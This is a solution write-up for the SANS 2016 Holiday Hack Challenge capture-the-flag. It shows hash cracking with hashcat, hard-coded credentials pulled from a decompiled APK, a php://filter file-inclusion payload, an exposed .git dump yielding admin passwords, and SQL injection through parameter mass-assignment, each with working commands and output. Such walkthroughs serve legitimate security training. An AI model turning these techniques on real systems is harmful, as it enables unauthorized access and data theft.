SANS 2016 Holiday Hack Writeup

At first, Santa's tweets seem rather nonsensical, filled with tweets like:

SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO

Writing a quick script to grab them all, however, reveals a pattern:

#!/usr/bin/env python

from twitter import *
from HTMLParser import HTMLParser

import settings

twitter = Twitter(auth=OAuth(settings.oauth_token, settings.oauth_token_secret,
                             settings.consumer_key, settings.consumer_secret))

h = HTMLParser()
max_id = 0

tweets = twitter.statuses.user_timeline(screen_name="santawclaus", count=100)
while True:
    for tweet in tweets:
        print h.unescape(tweet['text'])
        max_id = tweet['id']
    if len(tweets) < 100:
        break
    tweets = twitter.statuses.user_timeline(screen_name="santawclaus", count=100, max_id=max_id)

Converting the output a bit makes it easier to view the result:

a2ps -Bl 420 part1.out -o part1.ps
convert -density 400 part1.ps -trim +repage -alpha remove -fill black twitter.png

A close inspection of the images on Santa's Instagram feed reveal two important clues: a filename and a website.

Indeed, visiting http://www.northpolewonderland.com/SantaGram_v4.2.zip gives us a zip file.

Curses! It's password protected. Trying a few variations of the message hidden in the tweets, the password can be discovered (bugbounty).

The ZIP file contains the SantaGram Android app (as an APK file).

Question 3 tells us that there's at least one set of credentials in the APK file:

egrep --recursive --word-regexp --color '(username|password)' SantaGram_4.2

SantaGram_4.2/android/support/v4/j/a/c.java:        stringBuilder.append("; password: ").append(k());
SantaGram_4.2/com/northpolewonderland/santagram/b.java:            jSONObject.put("username", "guest");
SantaGram_4.2/com/northpolewonderland/santagram/b.java:            jSONObject.put("password", "busyreindeer78");
SantaGram_4.2/com/northpolewonderland/santagram/Configs.java:    public static String USER_USERNAME = "username";
SantaGram_4.2/com/northpolewonderland/santagram/Login.java:                                    aVar.b((CharSequence) "We've sent you an email to 
SantaGram_4.2/com/northpolewonderland/santagram/SplashScreen.java:            jSONObject.put("username", "guest");
SantaGram_4.2/com/northpolewonderland/santagram/SplashScreen.java:            jSONObject.put("password", "busyreindeer78");
SantaGram_4.2/com/parse/ParseRESTUserCommand.java:        hashMap.put("username", str);
SantaGram_4.2/com/parse/ParseRESTUserCommand.java:        hashMap.put("password", str2);
SantaGram_4.2/com/parse/ParseUser.java:    private static final String KEY_PASSWORD = "password";
SantaGram_4.2/com/parse/ParseUser.java:    private static final String KEY_USERNAME = "username";
SantaGram_4.2/com/parse/ParseUser.java:            throw new IllegalArgumentException("Must specify a username for the user to log in with");
SantaGram_4.2/com/parse/ParseUser.java:            throw new IllegalArgumentException("Must specify a password for the user to log in with");
SantaGram_4.2/com/parse/ParseUser.java:            throw new IllegalArgumentException("Can't remove the username key.");
SantaGram_4.2/com/parse/ParseUser.java:                final String username = currentUser.getUsername();
SantaGram_4.2/com/parse/ParseUser.java:                final String password = currentUser.getPassword();
SantaGram_4.2/com/parse/ParseUser.java:                                if (username != null) {
SantaGram_4.2/com/parse/ParseUser.java:                                    currentUser.setUsername(username);
SantaGram_4.2/com/parse/ParseUser.java:                                if (password != null) {
SantaGram_4.2/com/parse/ParseUser.java:                                    currentUser.setPassword(password);
SantaGram_4.2/com/parse/ParseUser.java:            throw new ParseException(-1, "Unable to saveEventually on a ParseUser with dirty password");
SantaGram_4.2/res/layout/login.xml:            <EditText android:id="@id/usernameTxt" android:layout_width="match_parent" android:layout_height="
SantaGram_4.2/res/layout/login.xml:            <EditText android:id="@id/passwordTxt" android:layout_width="match_parent" android:layout_height="
SantaGram_4.2/res/layout/login.xml:                <Button android:textSize="12dp" android:textColor="#fff" android:id="@id/forgotPassButt" andro
SantaGram_4.2/res/layout/sign_up.xml:            <EditText android:id="@id/passwordTxt2" android:layout_width="match_parent" android:layout_heigh

As we're looking for a resource, we'll search the unzipped contents of the APK (not the jadx decompilation) for files with an audio extension:

find SantaGram_4.2_apk_contents -iname '*.mp3' -or -iname '*.mp4' -or -iname '*.aac' -or -iname '*.flac' -or -iname '*.ogg'

SantaGram_4.2_apk_contents/res/raw/discombobulatedaudio1.mp3

And just like that, we have our first piece of the puzzle.

Poking around in the Cranbian image a bit, we can find a 'cranpi' account in /etc/passwd and /etc/shadow.

sudo grep cranpi etc/{group,passwd,shadow}

etc/group:adm:x:4:cranpi
etc/group:dialout:x:20:cranpi
etc/group:cdrom:x:24:cranpi
etc/group:sudo:x:27:cranpi
etc/group:audio:x:29:cranpi
etc/group:video:x:44:cranpi
etc/group:plugdev:x:46:cranpi
etc/group:games:x:60:cranpi
etc/group:users:x:100:cranpi
etc/group:input:x:101:cranpi
etc/group:netdev:x:108:cranpi
etc/group:spi:x:999:cranpi
etc/group:i2c:x:998:cranpi
etc/group:gpio:x:997:cranpi
etc/group:cranpi:x:1000:
etc/passwd:cranpi:x:1000:1000:,,,:/home/cranpi:/bin/bash
etc/shadow:cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

The shadow file contains a password hash for the cranpi account. We can use the rockyou wordlist to try to bruteforce the hash.

Minty Candycane suggests using John the Ripper to crack password hashes. However, we've got better things to do with our time. Let's use ocl-hashcat, which will use GPU cracking:

sudo /opt/oclhashcat-plus-bin/cudaHashcat64.bin -m 1800 -a 0 --remove cranpi_shadow /opt/oclhashcat-plus-bin/rockyou.txt

cudaHashcat v2.01 starting...

Device #1: GeForce GTX 650, 2047MB, 1058Mhz, 2MCU
Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable Optimizers:
 * Zero-Byte
 * Single-Hash
 * Single-Salt
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: Kernel /opt/oclhashcat-plus-bin/kernels/4318/m01800.sm_30.64.cubin
Device #1: Kernel /opt/oclhashcat-plus-bin/kernels/4318/amp_a0_v1.sm_30.64.cubin

Cache-hit dictionary stats /opt/oclhashcat-plus-bin/rockyou.txt: 139921497 bytes, 14343296 words, 14343296 keyspace

$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:yummycookies

Session.Name...: cudaHashcat
Status.........: Cracked
Input.Mode.....: File (/opt/oclhashcat-plus-bin/rockyou.txt)
Hash.Target....: $6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DU...
Hash.Type......: sha512crypt, SHA512(Unix)
Time.Started...: Sat Dec 24 17:14:15 2016 (2 mins, 17 secs)
Speed.GPU.#1...:     3327 H/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 454860/14343296 (3.17%)
Rejected.......: 204/454860 (0.04%)
Restore.Point..: 453836/14343296 (3.16%)
HWMon.GPU.#1...: -1% Util, 55c Temp, 34% Fan

Started: Sat Dec 24 17:14:15 2016
Stopped: Sat Dec 24 17:16:46 2016

Once we tell Holly Evergreen that the password is yummycookies, we can now use the Cranberry Pi on the terminals.

Looking at the decompiled SantaGram code, the analytics_launch_url and analytics_usage_url are each used in a single place. The JSON that is sent to each of those URLs lists a username and password:

jSONObject.put("username", "guest");
jSONObject.put("password", "busyreindeer78");
jSONObject.put("type", "usage");
jSONObject.put("activity", str);
jSONObject.put("udid", Secure.getString(context.getContentResolver(), "android_id"));
new Thread(new Runnable() {
        public void run() {
            b.a(context.getString(R.string.analytics_usage_url), jSONObject);
        }
    }).start();

Visiting the URL, https://analytics.northpolewonderland.com/, redirects us to a login page. We're able to login with guest/busyreindeer78.

We notice an MP3 nav item at the top, which gives us discombobulatedaudio2.mp3

From the port scan, we see well-known ports for SSH, HTTP, HTTPS, and the uncommon port tcp/11111. If we connect to that, we get dropped in a game of Dungeon:

nc dungeon.northpolewonderland.com 11111

Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>

We have a couple of clues about Dungeon:

<Pepper Minstix> - When I need a break from bug bounty work, I play Dungeon. I've been playing it since 1978. I still have yet to beat the Cyclops…
<Pepper Minstix> - Alabaster's brother is the only elf I've ever seen beat it, and he really immersed himself in the game. [http://www.northpolewonderland.com/dungeon.zip](I have an old version here).
<Alabaster Snowball> - Did Pepper send you? She's obsessed with Dungeon!
<Alabaster Snowball> - I don't know if Dungeon can be won. I do believe there is a way to cheat though…

Did someone say cheat? Sign us up!

Searching around a bit shows that this is a copy of the text-based adventure game Dungeon, with a few modifications. The data is contained in dtextc.dat. In the dusty recesses of the Internet, we can find the original version, and we can find a C tool which will decode the file.

./cdungeon-decode -b zork/dtextc.dat  -a > dump_orig.txt
./cdungeon-decode -b dtextc.dat  -a > dump_sans.txt
diff --unified=1 dump_orig.txt dump_sans.txt

(Note: Some less interesting changes are removed for brevity):

--- a/dump_orig.txt
+++ b/dump_sans.txt
@@ -2052,4 +2052,6 @@ Room: 188: Small Square Room
  created hole through which you can barely discern the floor some ten
- feet below.  It doesn't seem likely you could climb back up.  There
- are exits to the west and south.
+ feet below.  It doesn't seem likely you could climb back up.  An
+ extremely dark and narrow chimney leads up from a fireplace.  Although
+ you might be able to get up the chimney, it seems unlikely that you
+ could get back down. There are exits to the west and south.
 Flags: 24576 (land light)
@@ -2061,2 +2063,6 @@ Exits:
   Flag: 32 (frobozz)
+ up: 2 192 (Elf Room)
+  Action: 3
+  Flag: 14 (lightload)
+  String: The chimney is too narrow for you and all of your baggage.

@@ -2104,2 +2110,30 @@ Exits:

+Room: 191: North Pole
+ You are at the North Pole. There is a blizzard blowing making it hard to
+ hear or see. In the distance you detect the busy sounds of Santa's elves
+ in full production. To the north you discern the outline of a door with a
+ warm glow omitting from under the door.
+Value: 50
+Flags: 24576 (land light)
+Exits:
+ north: 0 192 (Elf Room)
+
+Room: 192: Elf Room
+ You have mysteriously reached the North Pole.
+ In the distance you detect the busy sounds of Santa's elves in full
+ production.
+
+ You are in a warm room, lit by both the fireplace but also the glow of
+ centuries old trophies.
+ On the wall is a sign:
+               Songs of the seasons are in many parts
+               To solve a puzzle is in our hearts
+               Ask not what what the answer be,
+               Without a trinket to satisfy me.
+Value: 50
+Flags: 24592 (end land light)
+Exits:
+ south: 0 191 (North Pole)
+ down: 0 188 (Small Square Room)
+

@@ -2741,3 +2782,4 @@ Room: 8 (Living Room)
 Read:
- The engravings translate to, "This space intentionally left blank".
+ The engravings translate to, "This space intentionally left blank."
+ "The implementers blame Mike Poor."

@@ -3894,2 +3936,11 @@ Flag1: -32256 (nodescription visible)

+Object: 217: Elf
+ The elf is facing you keeping his back warmed by the fire.
+Action: 61
+Flag1: -32736 (victim visible)
+Flag2: 128 (villian)
+Size: 10000
+Capacity: 10000
+Room: 192 (Elf Room)
+
 Double room: 63 (window) in 6 (Kitchen)
@@ -4443,2 +4499,4 @@ Message: 119
  wisp of smoke, his laughter fading in the distance.
+ When the smoke clears, the phrase "Try the online version for the true prize"
+ is all that remains.
 Message: 120
@@ -5262,3 +5320,3 @@ Message: 484
 Message: 485
- This gives you the rank of Cheater.
+ This gives you the rank of Hacker.
 Message: 486
@@ -6593 +6651,13 @@ Message: 1022
  to his livelihood.
+Message: 1023
+ The elf, willing to bargain, says "What's in it for me?"
+Message: 1024
+ The elf, satisified with the trade says -
+ Try the online version for the true prize
+Message: 1025
+ "That wasn't quite what I had in mind", he says, tossing
+ the # into the fire, where it vanishes.
+Message: 1026
+ The elf appears increasingly impatient.
+Message: 1027
+ The elf says - you have conquered this challenge - the game will now end.

Looks like there are 3 new rooms, Mike Poor left a space blank, a new villain (the Elf), and some additional messages. Unfortunately, we need to use the online version, and not just run it locally. But, we still would rather cheat and bypass all that actual game-playing.

If we look at the binary file with strings, we can see an interesting menu:

Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take

Searching around tells us that that is the menu from the Game Debugging Tool, which can be entered by typing "gdt" at the prompt:

: Welcome to Dungeon.                     This version created 11-MAR-78.
: You are in an open field west of a big white house with a boarded
: front door.
: There is a small wrapped mailbox here.
: >gdt
: GDT>help
: Valid commands are:
: AA- Alter ADVS          DR- Display ROOMS
: AC- Alter CEVENT        DS- Display state
: AF- Alter FINDEX        DT- Display text
: AH- Alter HERE          DV- Display VILLS
: ...

Our diff flagged a couple of messages as being important, such as 1024: "The elf, satisified with the trade says - Try the online version for the true prize". One of the debugging commands is DT, which will display text messages:

printf "gdt\ndt\n1024\nexit\nquit\ny\n" | nc dungeon.northpolewonderland.com 11111 | grep --context=1 elf

There is a small wrapped mailbox here.
>GDT>Entry:    The elf, satisified with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.

Excellent! We can now e-mail peppermint@northpolewonderland.com and we receive discombobulatedaudio3.mp3.

Similar to the analytics URLs, the debug data collection URL is only used in one place:

final JSONObject jSONObject = new JSONObject();
jSONObject.put("date", new SimpleDateFormat("yyyyMMddHHmmssZ").format(Calendar.getInstance().getTime()));
jSONObject.put("udid", Secure.getString(getContentResolver(), "android_id"));
jSONObject.put("debug", getClass().getCanonicalName() + ", " + getClass().getSimpleName());
jSONObject.put("freemem", Runtime.getRuntime().totalMemory() - Runtime.getRuntime().freeMemory());
new Thread(new Runnable(this) {
    final /* synthetic */ EditProfile b;

    public void run() {
        b.a(this.b.getString(R.string.debug_data_collection_url), jSONObject);
    }
}).start();

We can fake a request, and see what happens:

curl -s -H "Content-Type: application/json" \
-d '{"date": "20170101010101-0800", "udid": "11111111", "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile", "freemem": "10200"}' \
http://dev.northpolewonderland.com/index.php | python -mjson.tool

{
    "date": "20170102184745",
    "filename": "debug-20170102184745-0.txt",
    "request": {
        "date": "20170101010101-0800",
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "freemem": "10200",
        "udid": "11111111",
        "verbose": false
    },
    "status": "OK"
}

Alabaster Snowball has some useful advice for us:

<Alabaster Snowball> - My favorite hacking technique? It has to be JSON parameter editing.
<Alabaster Snowball> - After capturing RESTful web traffic in Burp Suite, I right-click and select "Copy as Curl Command".
<Alabaster Snowball> - Then, just paste it into a script, and start tweaking parameters.
<Alabaster Snowball> - You can use Burp Repeater too, but I am trying to live up to Santa's command line Kung-fu!
<Alabaster Snowball> - Always compare the request and the response data. Any time I see an interesting variation, I start changing the parameters around. Super fun!

Luckily, the response includes the request, and we see that an additional field is present, verbose, and that it defaults to false. Let's set it to true and see what happens:

curl -s -H "Content-Type: application/json" \
-d '{"date": "20170101010101-0800", "udid": "11111111", "debug": "com.northpolewonderland.santagram.EditProfile, \
     EditProfile", "freemem": "10200", "verbose": true}' \
http://dev.northpolewonderland.com/index.php | python -mjson.tool

{
    "date": "20170102185111",
    "date.len": 14,
    "filename": "debug-20170102185111-0.txt",
    "filename.len": 26,
    "files": [
        "debug-20161224235959-0.mp3",
        "debug-20170102181933-0.txt",
        "debug-20170102182005-0.txt",
        "debug-20170102183217-0.txt",
        "debug-20170102183254-0.txt",
        "debug-20170102183307-0.txt",
        "debug-20170102183641-0.txt",
        "debug-20170102183758-0.txt",
        "debug-20170102184301-0.txt",
        "debug-20170102184328-0.txt",
        "debug-20170102184330-0.txt",
        "debug-20170102184405-0.txt",
        "debug-20170102184419-0.txt",
        "debug-20170102184422-0.txt",
        "debug-20170102184458-0.txt",
        "debug-20170102184519-0.txt",
        "debug-20170102184531-0.txt",
        "debug-20170102184547-0.txt",
        "debug-20170102184612-0.txt",
        "debug-20170102184623-0.txt",
        "debug-20170102184632-0.txt",
        "debug-20170102184736-0.txt",
        "debug-20170102184741-0.txt",
        "debug-20170102184745-0.txt",
        "debug-20170102185111-0.txt",
        "index.php"
    ],
    "request": {
        "date": "20170101010101-0800",
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "freemem": "10200",
        "udid": "11111111",
        "verbose": true
    },
    "status": "OK",
    "status.len": "2"
}

A close inspection shows that the file at the top is an MP3. We can download that file, but we don't know which file it is, since it has a different naming scheme.

exiftool debug-20161224235959-0.mp3 | egrep '(Track|Title)'

#RESULTS:

Track   : 4
Title   : 4

Looks like we got discombobulatedaudio4.mp3.

Visiting http://ads.northpolewonderland.com/, we see a very smiley web app, which seems to rely heavily on Javascript. Taking a look at the source code has many references to Meteor, a Javascript framework. Pepper Minstix has some advice for us:

<Pepper Minstix> - Lately, I've been spending time attacking JavaScript frameworks, specifically the [[https://www.meteor.com/][Meteor Framework].
<Pepper Minstix> - Meteor uses a publish/subscribe messaging platform. This makes it easy for a web page to get dynamic data from a server.
<Pepper Minstix> - Meteor's message passing mechanism uses the Distributed Data Protocol (DDP). DDP is basically a JSON-based protocol using WebSockets and SockJS for RPC and data management.
<Pepper Minstix> - The good news is that Meteor mitigates most XSS attacks, CSRF attacks, and SQL injection attacks.
<Pepper Minstix> - The bad news is that people get a little too caught up in messaging subscriptions, and get too much data from the server.
<Pepper Minstix> - You should check out Tim Medin's talk from HackFest 2016 and the related blog post.
<Pepper Minstix> - Also, Meteor Miner is a browser add-on for Tampermonkey to easily browse through Meteor subscriptions. Check it out!

Installing MeteorMiner reveals some additional information about the site. One of the nice features is the list of routes, so we can try various pages. When we visit 'admin/quotes,' we see that HomeQuotes has 5 records. Digging into those records shows something interesting:

{"name": "home_quotes", "_docs": {"_map": {
   "drsCoXaLaitrx2xJP": {"index": 0, "quote": "Never Tired", "hidden": false},
   "ncN8EozkRGuq3hmd6": {"index": 1, "quote": "Never the Same!", "hidden": false},
   "qLqMmQFCurmaptYPj": {"index": 2, "quote": "Making Ads Great Again!", "hidden": false},
   "zC3qjywazw6vTorZQ": {"index": 3, "quote": "Is anyone actually reading this?", "hidden": false},
   "zPR5TpxB5mcAH3pYk": {"index": 4, "quote": "Just Ad It!", "hidden": true,
                         "audio": "/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3"
 }}}}

Downloading the file in the last entry gives us discombobulatedaudio5.mp3.

Once more, we have a URL, and can search through the decompiled app to see how it's intended to be used. We have two hits, which send a POST request with JSON content. Let's start poking at it and see what we need to send:

curl -s -H "Content-Type: application/json" -d '{}' http://ex.northpolewonderland.com/exception.php

Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

curl -s -H "Content-Type: application/json" -d '{"operation":"ReadCrashDump"}' http://ex.northpolewonderland.com/exception.php

Fatal error! JSON key 'data' must be set.

curl -s -H "Content-Type: application/json" -d '{"operation":"ReadCrashDump", "data": "Yes, please!"}' http://ex.northpolewonderland.com/exception.php

Fatal error! JSON key 'crashdump' must be set.

curl -s -H "Content-Type: application/json" -d '{"operation":"ReadCrashDump", "data": "Yes, please!", "crashdump": "dump"}' http://ex.northpolewonderland.com/exception.php

Fatal error! JSON key 'crashdump' must be set.

Interesting. Let's see if data is a nested object, and crashdump is a key in there:

curl -sv -H "Content-Type: application/json" -d '{"operation":"ReadCrashDump", "data": {"crashdump": "dump"}}' http://ex.northpolewonderland.com/exception.php

< HTTP/1.1 500 Internal Server Error
< Server: nginx/1.10.2
< Date: Mon, 02 Jan 2017 22:21:06 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive

Progress. We need to figure out a valid resource for it to read, though:

curl -s -H "Content-Type: application/json" -d $'{"operation":"ReadCrashDump", "data": {"crashdump": "php://filter/convert.base64-encode/resource=exception"}}' http://ex.northpolewonderland.com/exception.php | base64 -D > exception.php

<?php

# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

# Code from http://thisinterestsme.com/receiving-json-post-data-via-php/
# Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
    die("Request method must be POST\n");
}

# Make sure that the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strcasecmp($contentType, 'application/json') != 0){
    die("Content type must be: application/json\n");
}

# Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
	# If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
    die("POST contains invalid JSON!\n");
}

# Process the JSON.
if ( ! isset( $obj['operation']) or (
	$obj['operation'] !== "WriteCrashDump" and
	$obj['operation'] !== "ReadCrashDump"))
	{
	die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
if ( isset($obj['data'])) {
	if ($obj['operation'] === "WriteCrashDump") {
		# Write a new crash dump to disk
		processCrashDump($obj['data']);
	}
	elseif ($obj['operation'] === "ReadCrashDump") {
		# Read a crash dump back from disk
		readCrashdump($obj['data']);
	}
}
else {
	# data key unset
	die("Fatal error! JSON key 'data' must be set.\n");
}
function processCrashdump($crashdump) {
	$basepath = "/var/www/html/docs/";
	$outputfilename = tempnam($basepath, "crashdump-");
	unlink($outputfilename);

	$outputfilename = $outputfilename . ".php";
	$basename = basename($outputfilename);

	$crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');";
	file_put_contents($outputfilename, $crashdump_encoded);

	print <<<END
{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "$basename"
}

END;
}
function readCrashdump($requestedCrashdump) {
	$basepath = "/var/www/html/docs/";
	chdir($basepath);

	if ( ! isset($requestedCrashdump['crashdump'])) {
		die("Fatal error! JSON key 'crashdump' must be set.\n");
	}

	if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) {
		die("Fatal error! crashdump value duplicate '.php' extension detected.\n");
	}
	else {
		require($requestedCrashdump['crashdump'] . '.php');
	}
}

?>

Bingo. We note a comment towards the top of the file:

# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

and just like that, we have our penultimate audio file, from http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3

Last one. Let's quickly review the hints from the Holiday Hack Quest:

The only hint that we haven't used yet is using to scan for extra files on a web server:

<Minty Candycane> - NMAP is also great for finding extra files on web servers. The default scripts run with the "-sC" option work really well for me.

nmap -sC -p 443 104.198.252.157

Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-02 17:39 CST
Nmap scan report for 157.252.198.104.bc.googleusercontent.com (104.198.252.157)
Host is up (0.0043s latency).
PORT    STATE SERVICE
443/tcp open  https
| http-git:
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc)
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after:  2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_  http/1.1

Nmap done: 1 IP address (1 host up) scanned in 2.06 seconds

Git repository found! Let's recursively download it, then restore everything to the latest master:

wget -np -qr https://analytics.northpolewonderland.com/.git/
git reset --hard master

HEAD is now at 16ae0cb Finishing touches (style, css, etc)

ls

README.md        db.php           footer.php       index.php        logout.php       report.php       this_is_html.php view.php
crypto.php       edit.php         getaudio.php     js               mp3.php          sprusage.sql     this_is_json.php
css              fonts            header.php       login.php        query.php        test             uuid.php

Can we find some non-guest credentials?

git log -p | grep guest

+  // EXPERIMENTAL! Only allow guest to download.
+  if ($username === 'guest') {
+              if (get_username() == 'guest') {
   restrict_page_to_users($db, ['guest']);
-INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');
+INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');

Interesting… Trying administrator/KeepWatchingTheSkies allows us to login to the webapp with extra privileges. We notice that the MP3 link has now been replaced with an edit link.

Looking through the pages accessible to the admin user, we see three main pages:

1. Query lets us create a new query, and optionally save it
2. Edit allows us to modify a saved query
3. View displays the results from a saved query

Let's test out the functionality of each of those:

Let's begin. We'll create a usage query, and ensure that we save it:

Clicking the link takes us to the view page, and gives us some information about our query:

At this point, we can edit our query:

It looks like it worked, and we get the SQL command that was issued:

Checking for id...
Yup!
Checking for name...
Yup!
Checking for description...
Yup!
UPDATE `reports` SET `id`='61f9ec9b-6192-463b-aee5-5a0983362dff', `name`='Name_Field', 
       `description`='Description_Field' WHERE `id`='61f9ec9b-6192-463b-aee5-5a0983362dff'Update complete!

Reviewing the code in edit.php more closely reveals a vulnerability: we can set other fields of the report:

foreach($row as $name => $value) {
   print "Checking for " . htmlentities($name) . "...<br>";
   if(isset($_GET[$name])) {
     print 'Yup!<br>';
     $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'";
   }
}

Let's see how the query is created, in query.php:

if(isset($_REQUEST['save'])) {
  $id = gen_uuid();
  $name = "report-$id";
  $description = "Report generated @ " . date('Y-m-d H:i:s');
  $result = mysqli_query($db, "INSERT INTO `reports`
    (`id`, `name`, `description`, `query`)
  VALUES
    ('$id', '$name', '$description', '" . mysqli_real_escape_string($db, $query) . "')
    ");

We have one more field, the query, which edit.php doesn't natively expose, but we can trick it into editing for us. If we visit: https://analytics.northpolewonderland.com/edit.php?id=61f9ec9b-6192-463b-aee5-5a0983362dff&name=Name_Field&description=Description_Field&query=show tables;, we see:

Checking for id...
Yup!
Checking for name...
Yup!
Checking for description...
Yup!
Checking for query...
Yup!
UPDATE `reports` SET `id`='61f9ec9b-6192-463b-aee5-5a0983362dff', `name`='Name_Field', 
       `description`='Description_Field', `query`='show tables;' WHERE `id`='61f9ec9b-6192-463b-aee5-5a0983362dff'Update complete!

Loading our newly modified query in view.php shows that it worked:

Audio sounds interesting. Changing our query to select * from audio; gives us:

There it is! We just need to tweak our query a bit so that we can get it. select filename, to_base64(mp3) from audio;:

We'll join our MP3's together, speed them up a bit, and see what we hear:

sox discombobulatedaudio{1,2,3}.mp3 debug-20161224235959-0.mp3 discombobulatedaudio{5,6,7}.mp3 discombobulatedaudio.mp3
mplayer -af scaletempo -speed 5 discombobulatedaudio.mp3

The combined MP3 has 2 repetitions of a Dr. Who quote

Father Christmas, Santa Claus, or, as I've always known him, Jeff.

This is the password to the last door.

Finding the coins is tricky! Nothing to stop us from cheating one more time, though…

The coins would be so much easier to find if they were bright pink instead of gray. Let's download them and modify them:

for i in nw_coin_armor nw_coin_couch nw_coin_crate nw_coin_half nw_coin nw_coin_rack nw_coin_roof nw_coin_sink nw_coin_small_treehouse nw_coin_trough
do wget -q "https://quest2016.holidayhackchallenge.com/img/$i.png" -P original_coins
convert "original_coins/$i.png" -fill magenta -fuzz 80% -opaque black "$i.png"
done

Much better. It'd also be useful if some of the floating layers were more transparent, so we can see any coins tucked behind them:

for i in floating netwars-floating78 netwars-floating small_treehouse
do wget -q "https://quest2016.holidayhackchallenge.com/img/tilesets/$i.png" -P original_tilesets
convert "original_tilesets/$i.png" -alpha on -channel a -evaluate set 25% "$i.png"
done

Now we set up an nginx reverse proxy to proxy our browser's traffic to quest2016.holidayhackchallenge.com and to replace the images with the ones that we modified:

server {
      listen 0.0.0.0:443;

      server_name quest2016.holidayhackchallenge.com;
      ssl on;

      # Your browser will need to trust this (self-signed) cert.
      ssl_certificate cert.pem;
      ssl_certificate_key key.pem;


      # Most things will pass straight through
      location / {
              proxy_pass https://quest2016.holidayhackchallenge.com;
              proxy_redirect          off;
              proxy_set_header        Accept-Encoding   "";
              proxy_set_header        Host            $host;
              proxy_set_header        X-Real-IP       $remote_addr;
              proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
              proxy_set_header        X-Forwarded-Proto $scheme;
              add_header              Front-End-Https   on;
      }

      # WebSocket stuff is a bit more complex
      location /socket.io {
          proxy_pass https://quest2016.holidayhackchallenge.com;
          proxy_http_version 1.1;
          proxy_set_header Upgrade $http_upgrade;
          proxy_set_header Connection "upgrade";
      }

      # Replace the coin images
      location ~* /img/nw_coin\.* {
      root /var/www/localhost/htdocs;
      }

      # And replace the tilesets
      location /img/tilesets/networks-floating78.png { root /var/www/localhost/htdocs; }
      location /img/tilesets/networks-floating.png { root /var/www/localhost/htdocs; }
      location /img/tilesets/floating.png { root /var/www/localhost/htdocs; }
      location /img/tilesets/small_treehouse.png { root /var/www/localhost/htdocs; }

}

Now, coins show up a bit brighter. Without further adieu, the locations of all 20 coins:

For the other 7 coins, we need to go back in time:

There are a few dates scattered around in the game. The Grinch sign counts from the most recent Christmas (since a Grinch-level event happened on 12/25/2016 as well). The Grinch sign in 1978 counts from the release of The Grinch who Stole Christmas on TV. When we time travel, we go to the day before the Star Wars Christmas Special airs.

There's a Tardis on Santa's desk:

Finally, we ran into a couple of extra characters: